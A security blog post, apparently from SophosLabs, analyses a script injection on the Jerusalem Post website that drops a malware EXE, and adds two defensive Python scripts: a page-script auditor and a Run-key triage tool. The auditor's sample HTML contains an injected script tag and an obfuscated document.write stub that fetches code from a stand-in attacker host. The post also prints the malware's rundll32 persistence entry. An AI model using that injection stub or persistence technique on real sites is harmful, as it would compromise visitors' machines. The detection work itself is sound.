A couple of posts on Twitter brought to my attention earlier today that the website of the Jerusalem Post is serving up malware to unsuspecting visitors.
Initially, I suspected that the malware was loaded via a compromised advert stream or one of the popups from the site. However, upon further investigation there were the tell-tale signs of hackers at work on the main site.
SophosLabs is adding detection for this SCRIPT injection as Mal/Badsrc-C.
This particular malicious script would have attempted to load other scripts detected by Sophos as Mal/JSShell-B and Troj/ExpJS-N.
Ultimately, the attack tries to load an EXE (log.exe) detected as Mal/Behav-290.
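The chain above starts with a SCRIPT tag injected into the site's own HTML. As an added example (not code from the post or from SophosLabs), here is the kind of check a site owner can run against their pages to surface unexpected script sources: every external `<script src>` whose host is not on the site's own allowlist, plus inline scripts that combine the decoder calls typically used by injected stubs. The sample page, the allowlist host and the obfuscation markers are constructed for the example; the post does not describe what the actual injected tag looked like.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect every <script src=...> URL and every inline <script> body."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attributes of external scripts
        self.inline = []        # bodies of inline scripts
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


# Markers that, in combination, are typical of an injected decoder stub.
# Heuristic list assumed by this example; not a description of the real injection.
OBFUSCATION_MARKERS = ("unescape(", "document.write(", "fromCharCode(", "eval(")


def audit_scripts(html, allowed_hosts):
    """Return (finding_type, detail) pairs for scripts a site owner did not expect.

    allowed_hosts: lowercase hostnames the site legitimately loads script from.
    Same-origin (relative) script URLs are not flagged.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src.strip()).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append(("external-script", src))
    for body in parser.inline:
        hits = [m for m in OBFUSCATION_MARKERS if m in body]
        if len(hits) >= 2:
            findings.append(("obfuscated-inline", ", ".join(hits)))
    return findings


# Constructed sample page (not the real site): one same-origin script, one
# allowed CDN script, one injected external script, and one inline decoder.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="http://cdn.example-allowed.net/lib.js"></script>
</head><body>
<p>story text</p>
<script src="http://attacker.invalid/x.js"></script>
<script>document.write(unescape('%3Cscript src=%22http://attacker.invalid/y.js%22%3E%3C/script%3E'));</script>
</body></html>"""
ALLOWED_HOSTS = {"cdn.example-allowed.net"}

if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_HTML, ALLOWED_HOSTS):
        print(kind, detail)
```

Run this over a fetched copy of each page template, or over a crawl of the site, and diff the output against the last known-clean run; an injected tag usually shows up as a new external host, and the inline decoder pattern catches the case where the injected tag is built at runtime rather than written directly into the HTML.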
Mal/Behav-290 includes functionality to:
- run automatically
- access the internet and communicate with a remote server via HTTP
Mal/Behav-290 communicates via HTTP with the following locations:
d .*******. us
When Mal/Behav-290 is installed it creates the file <user>\Microsoft\smx4pnp.dll (where <user> is a placeholder for the infected user's profile path).
The following registry entry is created so that rundll32.exe loads the DLL and calls its exported Launch function on startup:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run smx4pnp rundll32.exe "<user>\Microsoft\smx4pnp.dll", Launch
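The persistence mechanism is an ordinary HKCU Run value, which makes it easy to triage across a fleet. As an added example (not code from the post or from SophosLabs), the script below takes the name/data pairs of a user's Run key, as exported by a registry tool, and flags two patterns: rundll32.exe being used as a loader (reporting which DLL and export it invokes) and any autorun target that lives in a user-writable location. The sample Run values are constructed for the example; only the smx4pnp entry mirrors the key described above, and the list of user-writable path markers is a heuristic assumed here.

```python
import re

# Path fragments that mark locations an ordinary user can write to; an
# autorun entry pointing there deserves a closer look. Heuristic list assumed
# by this example; <user> is the placeholder used in the write-up above.
USER_WRITABLE_MARKERS = (
    "<user>",
    "\\appdata\\",
    "\\temp\\",
    "\\users\\",
    "\\documents and settings\\",
)

_ARG_RE = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmd):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in _ARG_RE.findall(cmd)]


def triage_run_entry(value_data):
    """Return the reasons a Run value looks suspicious (empty list if none)."""
    reasons = []
    args = split_cmdline(value_data)
    if not args:
        return reasons
    exe = args[0].rsplit("\\", 1)[-1].lower()
    if exe in ("rundll32.exe", "rundll32"):
        # rundll32 syntax is "<dll>,<export> [args]"; the comma may be glued
        # to the DLL path or stand on its own, so rejoin and split on the comma.
        target = " ".join(args[1:])
        dll, _, rest = target.partition(",")
        dll = dll.strip()
        export = rest.strip().split(" ")[0] if rest.strip() else "?"
        reasons.append(f"rundll32 loads {dll} via export {export}")
        if any(m in dll.lower() for m in USER_WRITABLE_MARKERS):
            reasons.append("DLL lives in a user-writable location")
    elif any(m in args[0].lower() for m in USER_WRITABLE_MARKERS):
        reasons.append("executable lives in a user-writable location")
    return reasons


def triage_run_values(values):
    """Map value name -> reasons, for every entry that produced at least one reason."""
    result = {}
    for name, data in values.items():
        reasons = triage_run_entry(data)
        if reasons:
            result[name] = reasons
    return result


# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# values (name -> data), not taken from a real machine. The second entry
# mirrors the persistence key described in the post.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
    "smx4pnp": r'rundll32.exe "<user>\Microsoft\smx4pnp.dll", Launch',
    "updater": r'C:\Users\alice\AppData\Local\Temp\log.exe',
}

if __name__ == "__main__":
    for name, reasons in triage_run_values(SAMPLE_RUN_VALUES).items():
        print(name + ":", "; ".join(reasons))
```

The rundll32 check is deliberately generic rather than keyed to the smx4pnp name: the same loader-plus-user-profile-DLL shape turns up with other file names, and a rule tied to one name would miss the next variant. Legitimate per-user installers also write under the profile, so treat a hit as a lead to examine the DLL and its network behaviour, not as a verdict.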
In the current climate some will assume that the site has been hacked by a politically motivated hacker. However, in my experience the majority of hacks like this are done via a scattergun approach and it was just bad luck (and bad website security) that meant that the Jerusalem Post was the victim.